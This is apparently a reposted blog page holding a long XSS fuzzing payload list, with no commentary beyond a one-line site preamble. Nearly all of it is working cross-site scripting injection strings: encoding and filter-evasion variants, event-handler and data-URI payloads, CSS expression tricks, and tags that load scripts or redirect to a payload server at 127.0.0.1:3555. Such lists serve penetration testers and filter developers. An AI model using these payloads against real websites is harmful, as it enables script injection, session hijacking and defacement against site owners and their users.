常用xss fuzz 列表

Posted 2020-12-29 had3s

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了常用xss fuzz 列表相关的知识，希望对你有一定的参考价值。

-alert(1)-

-prompt(1)-

javascript:confirm(1)

javascript:confirm(1);

javascript:alert(1)

javascript:alert(1);

avascript:alert(1)

javaSCRIPT&colon;alert(1)

JaVaScRipT:alert(1)

javas&Tab;cript:u0061lert(1);

javascript:u0061lert(1&#x29

javascript:alert(document&period;cookie)

vbscript:alert(1);

vbscr&Tab;ipt:alert(1)"

‘‘;!--"<KCF>=&{()}

<SCRIPT>+alert("KCF");</SCRIPT>

<SCRIPT>+alert("KCF")</SCRIPT>

‘ ‘><script>alert(1)</script>

‘‘><script>alert(1)</script>

???script?alert(1)?/script?

</script><script>alert(1)</script>

<scrx00ipt>confirm(1);</scrx00ipt>

<form action=‘data:text/html,<script>alert(1)&lt/script&gt‘><button>CLICK

<form action=‘java&Tab;scri&Tab;pt:alert(1)‘><button>CLICK

<form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>

<form action="&Tab;javas&Tab;cript&Tab;:alert(‘KCF :)‘)" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>

<form id="myform" value="" action=javascript&Tab;:eval(document.getElementById(‘myform‘).elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>

‘">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/KCF/) type=submit>‘-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>‘"><img src="http://127.0.0.1:3555/xss_serve_payloads/kcf.jpg">

<form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById(‘myform‘).elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>

<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))

<img/src=‘http://127.0.0.1:3555/xss_serve_payloads/kcf.jpg‘ onmouseover=&Tab;prompt(1)

<iframesrc="javascript:alert(2)">

<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">

<isindexformaction="javascript:alert(1)" type=image>

<form><button formaction=javascript&colon;alert(1)>CLICKME

“/><marquee onfinish=confirm(1)>a</marquee>

<object data=‘data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>‘>

<img src= "a" onerror= ‘eval(atob("cHJvbXB0KDEpOw=="))‘

<script>document.write(toStaticHTML("<style>div{font-family:rgb(‘0,0,0)‘‘‘}foo‘);color=expression(alert(1));{}</style><div>POC</div>"))</script>

‘;!--"<XSS><script>alert(1);</script>={()}

<script>document.body.innerHTML="<a onmouseover%0B=location=‘x6Ax61x76x61x53x43x52x49x50x54x26x63x6Fx6Cx6Fx6Ex3Bx61x6Cx65x72x74x26x6Cx70x61x72x3Bx31x26x72x70x61x72x3B‘><input name=attributes>";</script>

asfunction:getURL,javascript:alert(1)//

\%22))}catch(e){}if(!self.a)self.a=!alert(1)//

"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//

0%5C"))%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(1)%7D%7D//

<listing>&ltimg src=x onerror=alert(1)&gt</listing>

"onmouseover=alert(1);a="

‘+alert(1)&&null==‘

+alert(1)&&null==‘

\‘><script>1<\/script>

\‘><body onload=\‘1\‘>

"><script>1<\/script>

><script>1<\/script>

"><body onload="1">

<img src=a onerror=alert(1)

‘‘">

<scri%00pt>alert(1);</scri%00pt>

<scrix00pt>alert(1);</scri%00pt>

<s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>

<%0ascript>alert(1);</script>

<%0bscript>alert(1);</script>

<SCRIPT> alert("1");</SCRIPT>

<SCRIPT> alert("1")</SCRIPT>

%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80?

<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?

<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>?

<script>~‘u0061‘ ; u0074u0068u0072u006Fu0077 ~ u0074u0068u0069u0073. u0061u006Cu0065u0072u0074(~‘u0061‘)</script U+

<script/src=data&colon;text/ju0061vu0061&#115&#99&#114&#105&#112&#116,u0061%6C%65%72%74(/KCF/)></script ????????????

<img src ?itworksonchrome?/onerror = alert(1)???

<meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?

"><img src=x onerror=window.open(‘http://127.0.0.1:3555/xss_serve_payloads/kcf.html"‘);>

<marquee/onstart=confirm(2)>/

<body/onload=javascript:window.onerror=eval;throw‘=alertx281x29‘;

<a onmouseover=location=’javascript:alert(1)>click

<body onfocus="location=‘javascrpt:alert(1) >123

<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>

<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:u0061lert(1);"></g></svg>

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>?

<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">

eval("s=document.createElement(‘script‘);alert(1);document.getElementsByTagName(‘head‘)[0].appendChild(s)")

"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/kcf.html"

"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/kcf.html">

javascript:/*–></marquee></script></title></textarea></noscript></style></xmp>”> [img=1]<img -/style=-=expression&#40/*’/-/*‘,/**/eval(name)//);wi dth:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript :eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>”"/>

<img src=”<img src=x”/onerror=alert(1)//”> Jquery: <img/src/onerror=alert(1)>

<input id=x><input id=x><script>alert(x)</script>

<a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>

<a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>

<a href="123" id=x>test</a><script>x=‘javascript:alert(1)‘;</script>

<form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>

<form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>

%3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E

%3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E

<a/onmouseover[x0b]=location=‘x6Ax61x76x61x73x63x72x69x70x74x3Ax61x6Cx65x72x74x28x31x29x3B‘>KCF

data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E

window.name//‘name="javascript:alert("KCF")

<svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()

<%div%20style=xss:expression(prompt(1))>

%22]);}catch(e){}if(!self.a)self.a=!alert(1);/

<SCRIPT>a=/KCF/
alert(1);</SCRIPT>

<scr/**/ipt>alert(1)</sc/**/ipt>

#<script>alert(1)</script>

‘><script>KCF</script>

‘><body onload=‘KCF‘>

"><script>KCF</script>

><script>KCF</script>

"><body onload="KCF">

<img src=a onerror=alert(1)%0A>a

onmouseover=alert(1);

<<SCRIPT>alert(1);/

<SCRIPT>a=/kcf/

alert(1)

alert(String.fromCharCode(49))

alert(/1/.source)

eval(‘alert(1)‘)

this[‘EvAL‘.toLowerCase()](‘aLErT(1)‘.toLowerCase())

(alert(1)).replace(/.+/,eval);

u0061u006cu0065u0072u0074(1)

eval(‘u00‘ + ‘6‘ + ‘1‘+‘le‘ + ‘u0072‘ + ‘t(1)‘)

eval(‘141154145162164506151‘)

eval(‘x61x6cx65x72x74(1)‘)

eval(‘x61lerx74(1)‘)

top[‘ax6Cert‘](1)

x=‘x61x6cx65x72x74x28x31x29‘;new Function(x)()

setTimeout(‘alert(1)‘,0)

setTimeout(u0061u006cu0065u0072u0074(1),0);

onerror=eval;throw‘alertx281x29‘;

expression(URL=0)

expr65 ssion(URL=0)

expr65 ss/*???*/ion(URL=0);

expression28URL=029

expr65 ss/*%/ion28URL=029

00045xpr00065 ss/*BlABl/\aaaaa!!!*

javascript&colon;alert(1)

javascript:alert(1)

javAscRipt:alert(1)

feed:javascript:alert(1)

feed:javascript&colon;alert(1)

feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e

feed:data:text/html,%3csvg%20onload=alert%281%29%3e

data:text/html,%3Cscript%3Ealert(1)%3C/script%3E

data&colon;text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=

data:_;;;:;base64_______,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=

data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=

"><script>alert(String.fromCharCode(75,67,70))</script>

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></object>

<SCRIPT>x=/KCF/ alert(x.source)</SCRIPT>

<ScRiPt+>prompt(1)</ScRiPt>

"><img src=/ onerror=alert(1);>

<ScriPt>ALeRt(“ KCF ”)</scriPt>

”><script>alert(“KCF”)</script>

’><script>alert(1)</script>

&<script>alert(1);</script>

&{alert(1);};

<a href="about:<script>alert(1);</script>">

[xC0][xBC]script>alert(1);[xC0][xBC]/script>" };

<![CDATA[</script>

<script>alert(1);</script>

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42‘/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"

"><meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/kcf.html">

<meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/kcf.html">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PHNjcmlwdD5hbGVydCgnS0NGJyk8L3NjcmlwdD4=">

"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">

"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PHNjcmlwdD5hbGVydCgnS0NGJyk8L3NjcmlwdD4=">

<script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/kcf.html","_self");</script>

<SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"></SCRIPT>

<SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"></SCRIPT>

<SCRIPT a=">" ‘‘ SRC="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"></SCRIPT>

<SCRIPT "a=‘>‘" SRC="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"></SCRIPT>

<SCRIPT a=">‘>" SRC="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"></SCRIPT>

<SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>

<SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>

<SCRIPT a=">" ‘‘ SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>

<SCRIPT "a=‘>‘" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>

<SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>

<SCRIPT a=">‘>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>

<img src=‘http://127.0.0.1:3555/xss_serve_payloads/gif.gif‘ onload=‘document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"‘>

<img src=‘http://127.0.0.1:3555/xss_serve_payloads/gif.gif‘ onload=‘document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"‘>

<img src=‘http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif‘ onerror=‘document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"‘>

<img src=‘http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif‘ onerror=‘document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"‘>

<img src=‘http://127.0.0.1:3555/xss_serve_payloads/kcf.html‘ onload=alert(1)//></img>

<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>

<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>

<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>

“><script>prompt(1)</script>

“><script>alert(String.fromCharCode(75,67,70))</script>

‘><script>prompt(1)</script>

‘><script>alert(String.fromCharCode(75,67,70))</script>

<ScRIPt>prompt(1)</ScRIPt>

<ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>

“><ScRIPt>prompt(1)</ScRIPt>

“><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>

‘><ScRIPt>prompt(1)</ScRIPt>

‘><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>

</script><script>prompt(1)</script>

</script><script>alert(String.fromCharCode(75,67,70))</script>

“/><script>prompt(1)</script>

“/><script>alert(String.fromCharCode(75,67,70))</script>

‘/><script>prompt(1)</script>

‘/><script>alert(String.fromCharCode(75,67,70))</script>

</SCRIPT>”><SCRIPT>prompt(1)</SCRIPT>

</SCRIPT>”><SCRIPT>alert(String.fromCharCode(75,67,70))

</SCRIPT>”>”><SCRIPT>prompt(1)</SCRIPT>

</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>

%27%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E

%22%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E

%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45

%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45

%25%32%35%25%33%32%25%33%32%25%32%35%25%33%33%25%34%35%25%32%35%25%33%33%25%34%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35%25%32%35%25%33%34%25%34%32%25%32%35%25%33%34%25%33%33%25%32%35%25%33%34%25%33%36%25%32%35%25%33%33%25%34%33%25%32%35%25%33%32%25%34%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35

<marquee>Kerala Cyber Force</marquee>

<script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/kcf.html" )</script>

‘‘;}}</script><script>alert(1)</script>

></title><script>alert(KCF)</script>‘"><marquee><h1>Kerala Cyber Force</h1></marquee>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>

‘;!–<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}

!–<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}

<img src="blah>" onmouseover="alert(1);">

<IMG SRC="javascript:alert(1);"

</TITLE><SCRIPT>alert(1);</SCRIPT>

<IMG """><SCRIPT>alert(1)</SCRIPT>">

<img/src="1"/onerror="alert(1)"

SCRIPT>">‘><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>

‘ style=abc:expression(KCF) ‘ " style=abc:expression(KCF) "

" type=image src=null onerror=KCF " ‘ type=image src=null onerror=KCF ‘

onload=‘KCF‘ " onload="KCF"/onload="KCF"/onload=‘KCF‘/

‘"</script></xml></title></textarea></noscript></style></listing></xmp></pre><img src=null onerror=KCF>

<<script/src=http://127.0.0.1:3555/xss_serve_payloads/kcf.js></script

<<script/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>

";location=‘javascript:alert(1)‘;

";location=location.hash)//#0={};alert(1)

";eval(unescape(location))//#%0Aalert(1)

<b "<script>alert(1)</script>">KCF</b>

</a onmousemove="alert(1)">

data:text/html,<script>alert(1)</script>

?script?alert(￠KCF￠)?/script?

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">

<div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/kcf.html);">

<div style="behaviour: url(‘http://127.0.0.1:3555/xss_serve_payloads/kcf.html‘);">

<div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/kcf.html"));">

<SCRIPT <B>alert(1);</SCRIPT>

<<SCRIPT>alert(1);//<</SCRIPT>

<<script>alert(1);</script>

<IMG SRC="javascript:alert(1)"

<SCRIPT>a=/KCF/alert(a.source)</SCRIPT>

";alert(1);//

"><img src=x onerror=prompt(1);>

<ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script><script src=http://127.0.0.1:3555/xss_serve_payloads/kcf.js>

<ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script><script src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp>

</script><script>alert(KCF

%7D%3C/style%3E43%27%22%3E%3C/title%3E%3Cscript%3Ea=eval;b=alert;a(b(/KCF/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EKCF%3C/h1%3E%3C/marquee%3E

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#75;&#67;&#70;&#34;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

‘)alert(1);

");alert(1);

“;alert(“KCF”);”

“;alert(String.fromCharCode(75,67,70));”

‘;alert(“KCF”);’

‘;alert(String.fromCharCode(75,67,70));’

“;alert(“KCF”)

“;alert(String.fromCharCode(75,67,70))

‘;alert(“KCF”)

‘;alert(String.fromCharCode(75,67,70))

“><script >alert(1)</script>

<iframe src="http://127.0.0.1:3555/xss_serve_payloads/kcf.html" width="800" height="800">iframe</iframe>

<A HREF="javascript:document.location=‘http://127.0.0.1:3555/xss_serve_payloads/kcf.html‘">KCF</A>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#75;&#67;&#70;&#39;&#41;&#59;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<DIV STYLE="background-image:07507206C028‘06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029‘029">

“><s”%2b”cript>alert(1)</script>

“><ScRiPt>alert(1)</script>

“><<script>alert(1);//<</script>

foo%00<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

‘;alert(String.fromCharCode(75,67,70))//‘;alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--&gt;&lt;/SCRIPT&gt;"&gt;‘&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(75,67,70))&lt;/SCRIPT&gt;

‘;alert(String.fromCharCode(75,67,70))//‘;alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">‘><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}

‘‘;!--"<KCF>=&{()}

<IMG """><SCRIPT>alert(1)</SCRIPT>">

&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;

&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;

&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;

&lt;IMG&#x0D;SRC&#x0D;=&#x0D;"&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;‘&#x0D;X&#x0D;S&#x0D;S&#x0D;‘&#x0D;)&#x0D;"&#x0D;>&#x0D;

<STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>KCF

<STYLE>@import‘javasc
ipt:alert(1)‘;</STYLE>

exp/*<A STYLE=‘nokcf:nokcf("*//*");kcf:&#101;x&#x2F;*KCF*//*/*/pression(alert(1))‘>

<STYLE TYPE="text/javascript">alert(1);</STYLE>

<STYLE>.KCF{background-image:url("javascript:alert(1)");}</STYLE>

<STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<? echo(‘<SCR)‘;echo(‘IPT>alert(1)</SCRIPT>‘); ?>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-

<XML ID=0><I><B><IMG SRC="javascript:alert(1)"></B></I></XML>

a="get";b="URL("";c="javascript:";d="alert(1);")";eval(a+b+c+d);

<?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="KCF&lt;SCRIPT DEFER&gt;alert(&quot;KCF&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>

<xml id="X"><a><b><script>alert(1);</script>;</b></a></xml>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

%253cscript%253ealert(1)%253c/script%253e

foo’; alert(1);//’;

</script><script >alert(1)</script>

‘; alert(1); var foo=’

><img src="x:x" onerror=alert(1)>

s%22%20style=x:expression(alert(1))

s%22%20style=%22background:url(javascript:alert(’KCF’))

s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27KCF%3F%29%29

%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(1);>

perl -e ‘print "<IMG SRC=javascript:alert("KCF")>";‘ > out

perl -e ‘print "<SCRIPT>alert("KCF")</SCRIPT>";‘ > out

perl -e ‘print "<IMG SRC=javascript:alert(1)>";‘> out

&lt;SCRIPT/KCF SRC="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT/KCF SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"&gt;&lt;/SCRIPT&gt;

<<SCRIPT>alert(1);//<</SCRIPT>

<IMG SRC="javascript:alert(1)"

<SCRIPT>a=/KCF/

alert(a.source)</SCRIPT>

</TITLE><SCRIPT>alert(1);</SCRIPT>

&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;KCF&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;KCF

